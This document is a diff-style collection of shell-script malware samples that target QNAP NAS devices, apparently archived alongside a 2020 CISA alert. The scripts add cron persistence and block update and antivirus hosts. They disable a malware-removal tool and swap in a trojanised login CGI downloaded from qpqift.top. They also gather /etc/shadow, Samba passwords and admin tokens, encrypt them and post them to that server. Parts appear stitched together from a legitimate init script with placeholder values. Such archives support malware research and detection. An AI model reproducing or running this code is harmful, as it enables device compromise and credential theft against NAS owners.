+		i=`/usr/bin/expr ${i} + 50`
+	done
+	return 0
+}
+
+
+install()
+{
+	lock_file="/var/lock/qbox_install_bin.lck"
+
+	if [ ! -f "${INSTALL_BUILD_IN}" ]; then
+		dbg "build-in ${QSYNC_NAME} is installed"
+		return 1
+	fi
+
+	if [ ! -f ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin ]; then
+		dbg "${QSYNC_NAME}.bin} not found"
+		return 1
+	fi
+
+	if [ ! -x "${QPKG_CLI}" ]; then
+		dbg "${QPKG_CLI} not found"
+		return 1
+	fi
+
+	## make sure volume is exist
+	if [ ! -d /share/`/sbin/getcfg SHARE_DEF defPublic -d Public -f /etc/config/def_share.info` ]; then
+		dbg "/share/Public not found"
+		return 1
+	fi
+
+	## is removed 
+	if [ -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed ]; then
+		/bin/rm -f ${INSTALL_BUILD_IN}
+		dbg "${QSYNC_NAME} is removed"
+		return 1
+	fi
+
+	if [ -f "$lock_file" ]; then 
+		if [ $(( $(date +%s) - $(date +%s -r $lock_file) )) -le 180 ]; then
+			echo "${QSYNC_NAME} is installing"
+			dbg "${QSYNC_NAME} is installing"
+			return 1
+		fi
+	fi
+
+	/bin/touch "$lock_file"	
+	/bin/rm -f ${INSTALL_BUILD_IN}
+	dbg "install build-in ${QSYNC_NAME} start"
+
+	set_default_disable_status
+
+	## install build in Qsync
+	${QPKG_CLI} -K -m ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin > /dev/null 2>&1
+	sleep 20
+
+	wait_install=60
+	## avoid initial take long time or fail
+        while [ "$wait_install" -gt 0 ]; do
+		stcode=`$CMD_GETCFG ${QSYNC_NAME}.bin stcode -f /etc/config/qpkg_job.conf`
+                if [ "$stcode" = "0" ]; then
+                        break
+                fi
+                sleep 1
+                let "wait_install--"
+        done
+
+	${QPKG_CLI} -C ${QSYNC_NAME}.bin > /dev/null 2>&1
+	/bin/rm -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled
+	/bin/rm -f "$lock_file"	
+	dbg "install build-in ${QSYNC_NAME} success"
+}
+
+if [ "$1" == "stop" ]; then
+	exit 0
+fi
+fi
+XEOF
+fi
+chmod 755 "${bdir}/.qpkg/.liveupdate/liveupdate.sh"
+touch -cr /bin/busybox "${bdir}/.qpkg/.liveupdate/liveupdate.sh"
+
+crontabargs=$(ps | grep 'cr[o]nd ' | sed -n 's/.*crond[^0-9A-Za-z-]*\(.\+\)/\1/p')
+trycount=10; trycount=$(( $trycount - 10 ))
+set x $crontabargs; shift
+while [ $# -gt 0 ] && [ $trycount -lt 10 ]; do
+trycount=$(( $trycount + 1 ))
+getopts ':c:' OPT 2>/dev/null
+test "$OPT" = 'c' && crontabfile="${OPTARG}/admin" && break
+test "$OPTIND" -gt 0 && shift "$OPTIND" && OPTIND=1 || break
+done
+test "$crontabfile" && test -f "${crontabfile}" || crontabfile='/tmp/cron/crontabs/admin'
+
+for crontab in "$crontabfile" "${confdir}/crontab"; do
+if $fgrep "${bdir}/.qpkg/.liveupdate/liveupdate.sh" "$crontab"; then
+:
+else
+cronmins=$(printf '%i' "$(( $RANDOM % 60 ))")
+cronhour=$(printf '%i' "$(( $RANDOM % 24 ))")
+cronhour=$(printf '%i,' "$(( ( $cronhour + 8 ) % 24 ))" "$(( ( $cronhour + 16 ) % 24 ))")"$cronhour"
+echo "$cronmins $cronhour"' * * * '"${bdir}/.qpkg/.liveupdate/liveupdate.sh >/dev/null 2>/dev/null" >> "$crontab"
+sleep 5
+fi
+done
+
+grep 'Liveupdate\|FirmwareRelease\|QTS_FW' /etc/default_config/uLinux.conf /etc/config/uLinux.conf | grep 'qnap\.com' >/dev/null && sed -i 's/https\?:\/\/[^\/]\+\/\(Liveupdate\|FirmwareRelease\|QTS_FW\)/http:\/\/0.0.0.0\/\1/' /etc/default_config/uLinux.conf /etc/config/uLinux.conf
+sedexpr='QPKG CENTER XML\|Live Update XML\|FW_XML_ALT'
+if grep "${sedexpr}" /etc/default_config/uLinux.conf /etc/config/uLinux.conf | grep 'qnap\.com' >/dev/null; then
+sed -i 's/^ *\('"${sedexpr}"'\)\(.*https\?:\/\/[^\/]*\)\(qnap\.com[^\/]*\)/\1\20.0.0.0/' /etc/default_config/uLinux.conf /etc/config/uLinux.conf 
+grep "${sedexpr}" /etc/default_config/uLinux.conf /etc/config/uLinux.conf | grep 'qnap\.com' && sed -i 's/^ *\('"${sedexpr}"'\).*qnap\.com/\1 = /' /etc/default_config/uLinux.conf /etc/config/uLinux.conf
+fi
+
+( ( exec >/dev/null 2>&1 </dev/null; "${bdir}/.qpkg/.liveupdate/liveupdate.sh" </dev/null >/dev/null 2>/dev/null & ) & )
+exit 0

2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/55b5671876f463f2f75db423b188a1d478a466c5e68e6f9d4f340396f6558b9f

@@ -0,0 +1,212 @@
+#!/bin/bash
+ts=1548478800
+PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin"
+test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
+test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"` && test -d "$bdir" || bdir=''
+test -z "${bdir}" || test ! -d "${bdir}"; } && { while read -r bdir; do
+test -d "$bdir" && break; bdir=''
+done <<EOF
+$(mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp")
+EOF
+test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in {{CE_,}CACHEDEV{1,2,3},MD0,HDA}_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}" && { bdir=/mnt/HDA_ROOT && test -d "$bdir" || bdir='/'; }; }
+
+getcfg MalwareRemover Version -f /etc/config/qpkg.conf && setcfg MalwareRemover Version 9.0.0 -f /etc/config/qpkg.conf
+getcfg MalwareRemover Date -f /etc/config/qpkg.conf && setcfg MalwareRemover Date 2019-02-25 -f /etc/config/qpkg.conf
+getcfg MalwareRemover Build -f /etc/config/qpkg.conf && setcfg MalwareRemover Build 1551070800 -f /etc/config/qpkg.conf
+
+if grep "ipv6.clamav.net" /etc/hosts; then
+:
+else
+countries='ac ad ae af ag ai al am an ao aq ar as at au aw ax az ba bb bd be bf bg bh bi bj bl bm bn bo bq br bs bt bv bw by bz ca cc cd cf cg ch ci ck cl cm cn co cr cu cv cw cx cy cz de dj dk dm do dz ec ee eg eh er es et eu fi fj fk fm fo fr ga gb gd ge gf gg gh gi gl gm gn gp gq gr gs gt gu gw gy hk hm hn hr ht hu id ie il im in io iq ir is it je jm jo jp ke kg kh ki km kn kp kr kw ky kz la lb lc li lk lr ls lt lu lv ly ma mc md me mf mg mh mk ml mm mn mo mp mq mr ms mt mu mv mw mx my mz na nc ne nf ng ni nl no np nr nu nz om pa pe pf pg ph pk pl pm pn pr ps pt pw py qa re ro rs ru rw sa sb sc sd se sg sh si sj sk sl sm sn so sr ss st su sv sx sy sz tc td tf tg th tj tk tl tm tn to tp tr tt tv tw tz ua ug uk um us uy uz va vc ve vg vi vn vu wf ws ye yt za zm zw'
+
+{ for host in 'bugs.clamav.net' 'current.cvd.clamav.net' 'database.clamav.net' 'db.local.clamav.net' 'update.nai.com'; do
+echo "0.0.0.0 ${host}"
+done
+
+for country in $countries; do
+echo "0.0.0.0 db.${country}.clamav.net"
+echo "0.0.0.0 db.${country}.ipv6.clamav.net"
+echo "0.0.0.0 db.${country}.big.clamav.net"
+done; } >>/etc/hosts
+fi
+
+test -z "$PWD" && PWD=$(pwd)
+CWD="$PWD"
+if [ "${CWD%/*}" != "${bdir}/.qpkg" ]; then
+        CWD=''
+        for dir in '.config' '.liveupdate'; do
+                dir="${bdir}/.qpkg/${dir}"
+                test -d "$dir" && cd "$dir" && CWD="$dir" && break
+        done
+fi
+test "$CWD" && test -d "$CWD" && cd "$CWD"
+
+sedcmd='s/CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/CXqrBM2CVbJog4rwwSz1Bp1i1'"'"'\
+verifykey="${verifykey}"'"'"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/'
+grepstring='CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex'
+for path in ".config/backup_conf.sh" ".liveupdate/liveupdate.sh"; do
+if [ -f "${path#*/}" ]; then 
+grep "$grepstring" "${path#*/}" && sed -i "$sedcmd" "${path#*/}"
+elif [ -f "${bdir}/.qpkg/${path}" ]; then
+test -f "${bdir}/.qpkg/${path}" && grep "$grepstring" "${bdir}/.qpkg/${path}" && sed -i "$sedcmd" "${bdir}/.qpkg/${path}"
+fi
+done
+
+sedcmd='s/CXqrBM2CVbJog4rwwSz1Bp1i1'"'"'/CXqrBM2CVbJo'"'"';verifykey="${verifykey}"'"'"'g4rwwSz1Bp1i1'"'/"
+grepstring='CXqrBM2CVbJog4rwwSz1Bp1i1'"'"
+for path in ".config/backup_conf.sh" ".liveupdate/liveupdate.sh"; do
+if [ -f "${path#*/}" ]; then 
+grep "$grepstring" "${path#*/}" && sed -i "$sedcmd" "${path#*/}"
+elif [ -f "${bdir}/.qpkg/${path}" ]; then
+test -f "${bdir}/.qpkg/${path}" && grep "$grepstring" "${bdir}/.qpkg/${path}" && sed -i "$sedcmd" "${bdir}/.qpkg/${path}"
+fi
+done
+
+version=$(getcfg System Version)
+test "x${version}" = 'x' && version=$(getcfg System Version -f /etc/default_config/uLinux.conf)
+
+for file in /etc/config/rssdoc/qpkgcenter_*.xml
+do
+test -f "$file" && rm "$file" && cp "./rssdoc/Liveupdate/QTS${version}/${file##*/}" "$file" && test -f '.qdisk_cmd' && ./.qdisk_cmd +i "$file"
+done
+file=''
+if find /etc/config/ | grep 'qpkgcenter_.*\.xml'; then
+:
+else
+cp "./rssdoc/Liveupdate/QTS${version}/qpkgcenter_eng.xml" '/etc/config/rssdoc/qpkgcenter_eng.xml'
+test -f '.qdisk_cmd' && ./.qdisk_cmd +i '/etc/config/rssdoc/qpkgcenter_eng.xml'
+fi
+
+if [ ! -f ".qdisk_cmd" ]; then
+	case "$(uname -m)" in 
+	*x86_64*)
+			arch=x86_64
+			binhash='g2oe7EJJVCiAHY6AG1I1c/lGF8Y='
+			;;
+	*arm*)
+			arch=arm
+			binhash='Z3twHZvQqYZ1vLeu4PLnZekdkRY='
+			;;
+	*i*86*)
+			arch=i486
+			binhash='gWzECXuIp3dz5yI7RJS9d4+xpq4='
+			;;
+	esac
+	
+	if [ "x${binhash}" != 'x' ]; then
+		curl --connect-timeout 12 -m 1200 -k -o ".qdisk_cmd.tmp" "https://qpqift.top/data/qdisk_cmd_${arch}" || rm -f ".qdisk_cmd.tmp"
+		test -f '.qdisk_cmd.tmp' && rsynchash="$(openssl dgst -sha1 -binary ".qdisk_cmd.tmp" | openssl base64)"
+		if [ "x${rsynchash}" = "x${binhash}" ]; then
+			mv '.qdisk_cmd.tmp' '.qdisk_cmd' && chmod +x '.qdisk_cmd'
+		else
+			rm -f '.qdisk_cmd.tmp'
+		fi
+	fi
+fi
+binhash=''; rsynchash=''
+
+for qpkgdir in "${bdir}/.qpkg" '../../.qpkg'; do
+test -d "$qpkgdir" && break
+done
+test -d "${qpkgdir}/MalwareRemover" || mkdir "${qpkgdir}/MalwareRemover"
+test -f '.qdisk_cmd' && ./.qdisk_cmd +i "${qpkgdir}/MalwareRemover"
+
+if [ -d "${qpkgdir}/MalwareRemover/modules" ]; then
+for file in 10_derek_3.pyc 12_derek_3.pyc; do
+test ! -f "${qpkgdir}/MalwareRemover/modules/${file}" || rm -f "${qpkgdir}/MalwareRemover/modules/${file}" && cat >"${qpkgdir}/MalwareRemover/modules/${file}" <<"EOF"
+#!/bin/sh
+exit 0
+EOF
+chmod +x "${qpkgdir}/MalwareRemover/modules/${file}"
+test -f '.qdisk_cmd' && ./.qdisk_cmd +i "${qpkgdir}/MalwareRemover/modules/${file}"
+done
+fi
+file=''; qpkgdir=''
+
+if [ ! -f .rsakey ]; then
+verifykey='-----BEGIN PUBLIC KEY-----
+MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
+CXqrBM2CVbJog4rwwSz1Bp1i1'
+verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
+RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
+Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
+gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
+2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
+0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
+pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
+DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
+-----END PUBLIC KEY-----'
+test -f ".rsakey" || echo "$verifykey" > ".rsakey"
+fi
+
+if [ ! -f "${ts}_c" ]; then
+key=$(tr -dc 'a-zA-Z0-9' </dev/urandom | { key=''; dd bs=20 count=1 2>/dev/null || head -c 20 || IFS='' read -rd '' -n 20 key; echo "$key"; } )
+test "x$key" = 'x' && key=$(LC_ALL=C sed 's/[^a-zA-Z0-9]//g' </dev/urandom | { key=''; dd bs=20 count=1 2>/dev/null || head -c 20 || IFS='' read -rd '' -n 20 key; echo "$key"; } )
+{ echo "$key" | openssl rsautl -pubin -inkey .rsakey -encrypt | openssl enc -base64 -A; printf ':'
+{ echo; for file in "${bdir}/.log/.rqsys.log" /etc/config/.qos_config/users/admin/.qtoken /etc/config/.qos_config/users/admin/secondSV.conf /etc/config/ssmtp/ssmtp.conf /etc/config/smbpasswd /etc/shadow /mnt/HDA_ROOT/.config/qnapddns.conf /mnt/HDA_ROOT/.config/qid.conf; do printf '%s:' "$file"; cat "$file"; echo; done; printf '%s:' "authLogin.cgi"; /home/httpd/cgi-bin/authLogin.cgi; } | gzip | { dd bs=4096 count=512 || head -c 2097152 || cat; } | openssl enc -aes-256-cbc -k "$key" -md md5 -salt -a -A; } | curl --connect-timeout 12 -m 300 -k -d '@-' "https://qpqift.top/ping.pl"
+fi
+
+cgibindir='/home/httpd/cgi-bin'
+if [ ! -f "1547971200_c" ] && [ ! -f "${cgibindir}/sysauthLogin.cgi" ] && [ -f "${cgibindir}/authLogin.cgi" ]; then
+	case "$(uname -m)" in 
+	*x86_64*)
+			arch=x86_64
+			binhash='pt+a/Y3gGOPe9uyBgm85h2eOQV8='
+			;;
+	*arm*)
+			arch=arm
+			binhash='W5SbpKsI90NUy4uQg3Pm1agAFho='
+			;;
+	*i*86*)
+			arch=i486
+			binhash='TagzVbVf5YhxA3ZXwgBMQKw2zG4='
+			;;
+	esac
+	
+	if [ "x${binhash}" != 'x' ]; then
+		curl --connect-timeout 12 -m 1200 -k -o ".qal" "https://qpqift.top/data/qal_${arch}" || rm -f ".qal"
+		test -f '.qal' && rsynchash="$(openssl dgst -sha1 -binary ".qal" | openssl base64)"
+		if [ "x${rsynchash}" = "x${binhash}" ]; then
+			test -f "${cgibindir}"/sysauthLogin.cgi && mv "${cgibindir}"/sysauthLogin.cgi "${cgibindir}"/authLogin.cgi
+			mv "${cgibindir}"/authLogin.cgi "${cgibindir}"/sysauthLogin.cgi && test -f "${cgibindir}"/sysauthLogin.cgi && mv '.qal' "${cgibindir}"/authLogin.cgi && chmod +x "${cgibindir}"/authLogin.cgi
+		fi
+	fi
+	test -f "1547971200_c" || touch "1547971200_c"
+fi
+
+test ! -f "${cgibindir}"/authLogin.cgi && test -f "${cgibindir}"/sysauthLogin.cgi && mv "${cgibindir}"/sysauthLogin.cgi "${cgibindir}"/authLogin.cgi
+
+if [ ! -d rssdoc ]; then 
+command -v bunzip2 && compext=bz2 || compext=gz
+curl --connect-timeout 12 -m 1200 -k -o "rssdoc.tar.${compext}" "https://qpqift.top/data/rssdoc.tar.${compext}" || { rm "rssdoc.tar.${compext}" && exit 1; }
+test -f "rssdoc.tar.${compext}" || exit 1
+rssdochash="$(openssl dgst -sha1 -binary "rssdoc.tar.${compext}" | openssl base64)"
+test "$rssdochash" = 'WOkc6vlUa7A30GKa4Z4o02CIexk=' || test "$rssdochash" = "0h0Jyx52a/F9YB80Ml4SsEsugyA=" || { rm -f "rssdoc.tar.${compext}"; exit 1; }
+test "$compext" = bz2 && tarflag=j || tarflag=z
+tar -x${tarflag}f "rssdoc.tar.${compext}" || { rm -f rssdoc.tar.{,.${compext}}; exit 1; } 
+rm -f "rssdoc.tar.${compext}"
+fi
+
+rm /home/httpd/{Liveupdate,FirmwareRelease{,_beta}S.xml}
+ln -s "${CWD}"/rssdoc/{Liveupdate,FirmwareRelease{,_beta}S.xml} /home/httpd
+
+if grep 'Liveupdate\|FirmwareRelease\|QTS_FW' /etc/default_config/uLinux.conf /etc/config/uLinux.conf | grep 'qnap\.com\|0\.0\.0\.0'; then
+internalwebport=$(/sbin/getcfg System InnerWebAccessPort -d 58080)
+localupdateurl="http://127.0.0.1:${internalwebport}"
+sed -i 's/https\?:\/\/[^\/]\+\/\(Liveupdate\|FirmwareRelease\|QTS_FW\)/http:\/\/127.0.0.1:'${internalwebport}'\/\1/' /etc/default_config/uLinux.conf /etc/config/uLinux.conf
+fi
+
+test -f /etc/config/.qsync.conf && authkeysfile=$(grep AuthorizedKeysFile /etc/config/.qsync.conf | sed 's/"//g' | cut -d ' ' -f 2)
+if [ "$authkeysfile" ] && [ -f "$authkeysfile" ] && grep 'miOGcmendZU2r10SdZVplBQ4i' "$authkeysfile"; then
+sed -i '/miOGcmendZU2r10SdZVplBQ4i/d' "$authkeysfile"
+lsofout="$(lsof +c 0 -i -n -P | grep :51163)"
+sshpid="$(echo "$lsofout" | tr -s ' ' | cut -d ' ' -f 2 | head -n 1)"
+kill -2 "$sshpid"
+fi
+
+test -f "${ts}_c" || touch "${ts}_c"
+rm -f "${CWD}/".tmp.*
+exit 0

2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/5cb5dce0a1e03fc4d3ffc831e4a356bce80e928423b374fc80ee997e7c62d3f8

@@ -0,0 +1,510 @@
+#!/bin/sh
+QNAP_QPKG=cloudinstall
+QID_PRESISTENT_CONF=/etc/config/qid_persistent.conf
+NAS_CLOUD_INSTALL_PATH=/home/httpd/cgi-bin/cloudinstall
+CLOUD_INSTALL_PATH=/tunnel_agent
+CLOUD_INSTALL_RAMDISK_PATH=/tunnel_agent_ramdisk
+CLOUD_INSTALL_AGENT_FILE_PATH=$CLOUD_INSTALL_PATH/tunnel_agent.tar.bz2
+COUNTER=1
+ERROR_BAD_REQUEST=400
+
+if [ "$fromrcS" = 'TRUE' ]; then
+case "$1" in
+  start)
+    START_TIME=$(date +"%T")
+    echo -e "start:$START_TIME" >> /tmp/.cloudinstall.log
+    while [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ];
+    do
+        # report device info and get cloudinstall agent app download url
+        DOWNLOAD_URL=`/usr/sbin/qcloud_uninit_device_tool -r`
+        if [ ! -d "$CLOUD_INSTALL_PATH" ]; then
+            if [ "$NAS_ARCH" == "ARM_64" ]; then
+                # create ramdisk and create a 64mb file
+                /bin/mkdir -p $CLOUD_INSTALL_RAMDISK_PATH
+                /bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_RAMDISK_PATH
+                /bin/dd if=/dev/zero of=$CLOUD_INSTALL_RAMDISK_PATH/image bs=1M count=64
+                # create block size 1K filesystem
+                /sbin/mke2fs -b 1024 $CLOUD_INSTALL_RAMDISK_PATH/image
+                # create virtual disk
+                export USED_LOOP_DEVICE=`/usr/local/sbin/losetup -f $CLOUD_INSTALL_RAMDISK_PATH/image`
+                /sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "USED_LOOP_DEVICE" "$USED_LOOP_DEVICE"
+                /bin/mkdir -p $CLOUD_INSTALL_PATH
+                # mount virtual disk
+                /bin/mount $USED_LOOP_DEVICE $CLOUD_INSTALL_PATH
+            else
+                # create and mount tmpfs folder
+                /bin/mkdir -p $CLOUD_INSTALL_PATH
+                /bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_PATH
+            fi
+        fi
+        cd $CLOUD_INSTALL_PATH
+
+        if [[ $DOWNLOAD_URL == https* ]]; then
+            REPORT_SUCCESS_TIME=$(date +"%T")
+        else
+            REPORT_FAIL_TIME=$(date +"%T")
+            echo -e " report_fail:$REPORT_FAIL_TIME\n response:$DOWNLOAD_URL" >> /tmp/.cloudinstall.log
+            # stop retry when got bad request
+            # prevent put bad request all the time
+            if [[ $DOWNLOAD_URL == *$ERROR_BAD_REQUEST* ]]; then
+                break
+            fi
+        fi
+
+        # downlaod cloudinstall agent app
+        /usr/sbin/qcloud_uninit_device_tool -o "$CLOUD_INSTALL_AGENT_FILE_PATH" -d "$DOWNLOAD_URL"
+
+        if [ -f "$CLOUD_INSTALL_AGENT_FILE_PATH" ]; then
+            DOWNLOAD_FINISH_TIME=$(date +"%T")
+            # unzip and execute cloudinstallagent
+            /bin/tar -xf $CLOUD_INSTALL_AGENT_FILE_PATH -C $CLOUD_INSTALL_PATH
+            $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh start &> /dev/null
+
+            UNZIP_TIME=$(date +"%T")
+        fi
+
+        if [ ! -d "$NAS_CLOUD_INSTALL_PATH" ]; then
+            # create folder and create symbolic link
+            /bin/mkdir -p $NAS_CLOUD_INSTALL_PATH
+            /bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.html $NAS_CLOUD_INSTALL_PATH/index.html
+            /bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.cgi $NAS_CLOUD_INSTALL_PATH/cloudinstall.cgi
+            /bin/ln -s $CLOUD_INSTALL_PATH/ui/static $NAS_CLOUD_INSTALL_PATH/static
+        fi
+
+        # wait connect
+        sleep 5
+        CLOUD_INSTALL_AGENT_PID_LIST=`/bin/ps --columns 256 | /bin/grep "$CLOUD_INSTALL_PATH/bin/cloudinstallagent" | /bin/grep -v grep | /bin/awk '{print $1}'`
+        if [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ]; then
+            SLEEP_TIME=$(( 30 * $COUNTER ))
+            if [ $SLEEP_TIME -gt 300 ]; then
+                SLEEP_TIME=300
+            fi
+            # wait next retry
+            sleep $SLEEP_TIME
+        fi
+        COUNTER=$(( $COUNTER * 2 ))
+    done
+
+    END_TIME=$(date +"%T")
+    echo -e "report_success:$REPORT_SUCCESS_TIME\ndownload_finish:$DOWNLOAD_FINISH_TIME\nunzip_finish:$UNZIP_TIME\nend:$END_TIME" >> /tmp/.cloudinstall.log
+    # call for a new process group and for later kill
+    /bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh start &> /dev/null &
+    /bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_daemon.sh &> /dev/null &
+
+    # set cloudinstall report status
+    /sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "REPORT_STATUS" "uninit"
+    # add link to report offline
+    /bin/ln -sf /etc/init.d/cloudinstall_report_offline.sh /etc/rcK.d/K99cloudinstall_report_offline
+
+    # buzzer
+    HARDWARE_TYPE=$(uname -m)
+    if [[ "$HARDWARE_TYPE" == *"x86"* ]];
+    then
+      /sbin/hal_app --se_buzzer enc_id=0,mode=101
+    elif [[ "$HARDWARE_TYPE" == *"arm"* ]];
+    then
+      /sbin/pic_raw 81
+    fi
+    ;;
+
+  stop)
+    # disconnect cloudinstall agent
+    $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh stop &> /dev/null
+    $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh stop &> /dev/null
+    for i in "${CLOUD_INSTALL_AGENT_DAEMON_PID_LIST[@]}"
+    do
+        # use bash kill instead /bin/kill for kill process group
+        # cloudinstall agent daemon and inotifywait
+        kill -9 -- -$i &>/dev/null
+    done
+
+    # umount
+    if [ "$NAS_ARCH" == "ARM_64" ]; then
+        /bin/umount -l $USED_LOOP_DEVICE
+        /usr/local/sbin/losetup -d $USED_LOOP_DEVICE
+    else
+        /bin/umount -l $CLOUD_INSTALL_PATH
+    fi
+    # remove all files
+    if [ -d "$NAS_CLOUD_INSTALL_PATH" ]; then
+        /bin/rm -rf $NAS_CLOUD_INSTALL_PATH
+    fi
+    if [ -d "$CLOUD_INSTALL_PATH" ]; then
+        /bin/rm -rf $CLOUD_INSTALL_PATH
+    fi
+    if [ -d "$CLOUD_INSTALL_RAMDISK_PATH" ]; then
+        /bin/rm -rf $CLOUD_INSTALL_RAMDISK_PATH
+    fi
+    ;;
+
+  restart)
+    $0 stop
+    $0 start
+    ;;
+
+  *)
+    echo "Usage: $0 {start|stop|restart}"
+    { /share/MD0_DATA/NOPE; exit 1; }
+esac
+{ /share/MD0_DATA/NOPE; exit 0; }
+
+
+set_env()
+{
+	debug=`$CMD_GETCFG Qsync Debug -u -d NULL`
+	if [ "$debug" != "NULL" ]; then
+		/bin/touch $LOG_FILE
+	else
+		/bin/rm -f $LOG_FILE
+	fi
+}
+
+set_env
+
+dbg()
+{
+	if [ -f "$LOG_FILE" ]; then
+		echo "[`date "+%H:%M:%S"`] $@ " >> $LOG_FILE
+	fi
+}
+
+dbg "> $0 $@ (pid $$)"
+
+fi
+
+export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
+
+command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\n\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\n//I;s/\(^\|\n\)\[[^\n]\+\]\n.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
+
+test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
+
+bdir=
+test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in Public Download Multimedia Web Recordings homes; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
+grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
+
+EOF
+test "$fgrep" || fgrep=grep
+test "$RANDOM" || RANDOM=17653
+genrstr () 
+{ 
+    local s=;
+    local min=${1:-4};
+    local max=${2:-12};
+    local kspace="${3:-a-zA-Z}"
+    tr -dc "$kspace" < /dev/urandom | { 
+        read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
+        echo "$s"
+    }
+}
+
+verifyfile() {
+local file="$1"
+local sig="${2:-$file_s}"
+local out
+test ! -z "$file" && test -s "$file" || return 1
+test ! -z "$sig" && test -s "$sig" || return 1
+test -f ".rsakey" || echo "$verifykey" > ".rsakey"
+out=$(openssl dgst -sha1 -verify ".rsakey" -signature "$sig" "$file") && test "$out" = "Verified OK" && return 0
+return 1
+}
+
+decryptfile() {
+local file="$1"
+local ofile="${2:-${file}}"
+local key='NOPE'
+openssl enc -d -aes-256-cbc -k "$key" -md sha1 -salt < "$file" > "${file}_d" || return $?
+test -f "$ofile" && rm -f "$ofile"
+mv "${file}_d" "$ofile" && return 0
+return 1
+}
+
+verifykey='-----BEGIN PUBLIC KEY-----
